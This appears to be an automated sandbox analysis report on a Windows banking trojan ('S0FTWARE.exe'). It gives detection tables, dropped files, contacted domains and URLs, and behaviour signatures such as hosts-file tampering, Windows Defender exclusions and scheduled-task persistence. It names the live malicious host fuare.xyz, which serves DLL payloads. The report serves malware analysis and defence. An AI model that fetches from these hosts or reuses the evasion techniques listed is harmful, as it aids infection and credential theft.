s-part-0017.t-0009.t-msedge.net 13.107.246.45, 443, 49707, 49711 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->121 125 26 other IPs or domains 28->125 file10 signatures11 process12 dnsIp13 87 C:\ProgramDatabehaviorgraphoogleUP\Chrome\Updater.exe, PE32+ 34->87 dropped 89 C:\Windows\System32\drivers\etc\hosts, ASCII 34->89 dropped 151 Uses powercfg.exe to modify the power settings 34->151 153 Modifies the hosts file 34->153 155 Adds a directory exclusion to Windows Defender 34->155 165 2 other signatures 34->165 49 powershell.exe 34->49         started        52 cmd.exe 34->52         started        54 sc.exe 34->54         started        67 12 other processes 34->67 91 C:\Users\user\AppData\Roaming\service.exe, PE32 38->91 dropped 157 Multi AV Scanner detection for dropped file 38->157 159 Machine Learning detection for dropped file 38->159 161 Switches to a custom stack to bypass stack traces 38->161 56 cmd.exe 38->56         started        163 Monitors registry run keys for changes 40->163 58 msedge.exe 40->58         started        133 192.168.2.5, 443, 49703, 49704 unknown unknown 46->133 135 239.255.255.250 unknown Reserved 46->135 60 chrome.exe 46->60         started        63 conhost.exe 46->63         started        65 timeout.exe 46->65         started        file14 signatures15 process16 dnsIp17 137 Loading BitLocker PowerShell Module 49->137 69 conhost.exe 49->69         started        71 WmiPrvSE.exe 49->71         started        73 conhost.exe 52->73         started        75 wusa.exe 52->75         started        77 conhost.exe 54->77         started        139 Uses schtasks.exe or at.exe to add and modify task schedules 56->139 83 2 other processes 56->83 127 www.google.com 142.250.186.164, 443, 49950, 49952 GOOGLEUS United States 60->127 129 plus.l.google.com 216.58.206.78, 443, 49996 GOOGLEUS United States 60->129 131 2 other IPs or domains 60->131 79 conhost.exe 67->79         started        81 conhost.exe 67->81         started        85 10 other processes 67->85 signatures18 process19

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        S0FTWARE.exe29%ReversingLabsWin32.Trojan.Generic

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\GHDAKKJJJK.exe100%Joe Sandbox ML
                        C:\ProgramData\AAFIJKKEHJ.exe4%ReversingLabs
                        C:\ProgramData\GHDAKKJJJK.exe54%ReversingLabsWin32.Trojan.BankerX
                        C:\ProgramData\GoogleUP\Chrome\Updater.exe4%ReversingLabs
                        C:\ProgramData\freebl3.dll0%ReversingLabs
                        C:\ProgramData\mozglue.dll0%ReversingLabs
                        C:\ProgramData\msvcp140.dll0%ReversingLabs
                        C:\ProgramData\nss3.dll0%ReversingLabs
                        C:\ProgramData\vcruntime140.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\NewApp[1].exe4%ReversingLabs
                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Updater[1].exe54%ReversingLabsWin32.Trojan.BankerX
                        C:\Users\user\AppData\Roaming\service.exe54%ReversingLabsWin32.Trojan.BankerX
                        C:\Windows\SysWOW64\0X1.9B5680P-1008PPDATA\service.exe (copy)54%ReversingLabsWin32.Trojan.BankerX

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        s3-w.us-east-1.amazonaws.com
                        		3.5.30.241
                        		truefalse
                          		high
                          chrome.cloudflare-dns.com
                          		172.64.41.3
                          		truefalse
                            		high
                            bitbucket.org
                            		185.166.143.49
                            		truefalse
                              		high
                              plus.l.google.com
                              		216.58.206.78
                              		truefalse
                                		high
                                t.me
                                		149.154.167.99
                                		truefalse
                                  		high
                                  fuare.xyz
                                  		116.203.0.159
                                  		truetrue
                                    		unknown
                                    ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                    		94.245.104.56
                                    		truefalse
                                      		high
                                      sb.scorecardresearch.com
                                      		18.245.60.72
                                      		truefalse
                                        		high
                                        s-part-0017.t-0009.t-msedge.net
                                        		13.107.246.45
                                        		truefalse
                                          		high
                                          www.google.com
                                          		142.250.186.164
                                          		truefalse
                                            		high
                                            googlehosted.l.googleusercontent.com
                                            		142.250.186.97
                                            		truefalse
                                              		high
                                              sni1gl.wpc.nucdn.net
                                              		152.199.21.175
                                              		truefalse
                                                		high
                                                assets.msn.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  bbuseruploads.s3.amazonaws.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    c.msn.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      ntp.msn.com
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        clients2.googleusercontent.com
                                                        		unknown
                                                        		unknownfalse
                                                          		high
                                                          bzib.nelreports.net
                                                          		unknown
                                                          		unknownfalse
                                                            		high
                                                            apis.google.com
                                                            		unknown
                                                            		unknownfalse
                                                              		high
                                                              api.msn.com
                                                              		unknown
                                                              		unknownfalse
                                                                		high

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731594386070&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                  		high
                                                                  https://fuare.xyz/freebl3.dlltrue
                                                                    		unknown
                                                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731594386067&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                      		high
                                                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1731594386743&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                        		high
                                                                        https://fuare.xyz/true
                                                                          		unknown
                                                                          https://c.msn.com/c.gif?rnd=1731594383155&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dd33d61a7826467984fdc77d7a858fcd&activityId=dd33d61a7826467984fdc77d7a858fcd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0false
                                                                            		high

                                                                            URLs from Memory and Binaries

                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                            https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2786571854.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731121904.000007C00011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742297584.000007C00140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2786571854.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000005.00000002.2730898591.000007C0000B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000005.00000002.2737001445.000007C000A64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.google.com/document/Jchrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739984141.000007C000F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732932489.000007C0004A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://anglebug.com/4633chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://anglebug.com/7382chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002F37000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://issuetracker.google.com/284462263msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://fuare.xyz/always=aBitLockerToGo.exe, 00000003.00000003.2482726756.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://polymer.github.io/AUTHORS.txtchrome.exe, 00000005.00000002.2731886350.000007C0002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655043573.000007C0010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657309033.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657234258.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657272393.000007C000788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657348248.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://docs.google.com/chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://docs.google.com/document/:chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000005.00000003.2654430117.000007C000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736405653.000007C0009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://anglebug.com/7714chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docs.google.com/presentation/oglchrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://unisolated.invalid/chrome.exe, 00000005.00000002.2736502342.000007C0009C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://fuare.xyz/softokn3.dllrHBitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://www.google.com/chrome/tips/chrome.exe, 00000005.00000002.2735222773.000007C00085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2735788481.000007C000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736292118.000007C000964000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://drive.google.com/?lfhs=2chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://anglebug.com/6248chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://drive.google.com/?lfhs=2ation.Result0chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://aui-cdn.atlassian.com/BitLockerToGo.exe, 00000003.00000002.3359198623.000000000319C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://anglebug.com/6929chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://anglebug.com/5281chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.youtube.com/?feature=ytcachrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739009563.000007C000DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://docs.googl0chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://issuetracker.google.com/255411748msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://anglebug.com/7246chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://anglebug.com/7369chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://anglebug.com/7489chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://docs.google.com/presentation/chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://duckduckgo.com/?q=chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://chrome.google.com/webstorechrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2829522376.00007CF00016C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://drive-daily-2.corp.google.com/chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://polymer.github.io/PATENTS.txtchrome.exe, 00000005.00000002.2731886350.000007C0002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655043573.000007C0010C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657309033.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657234258.000007C000CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657272393.000007C000788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657348248.000007C000FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2786571854.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://crl.ver)svchost.exe, 00000006.00000002.3284832870.0000028B2AE0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3039650772.0000015B47CD0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.5172346985.0000015B47CCB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://mail.google.com/mail/?usp=installed_webapp0chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://twitter.comif-unmodified-sinceillegalS0FTWARE.exe, 00000000.00000002.2229780239.000000000107A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://chrome.google.com/webstore?hl=en3chrome.exe, 00000005.00000002.2740718077.000007C00102C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://issuetracker.google.com/161903006msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://drive-daily-1.corp.google.com/chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.youtube.com/chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://drive-daily-5.corp.google.com/chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://duckduckgo.com/favicon.icochrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
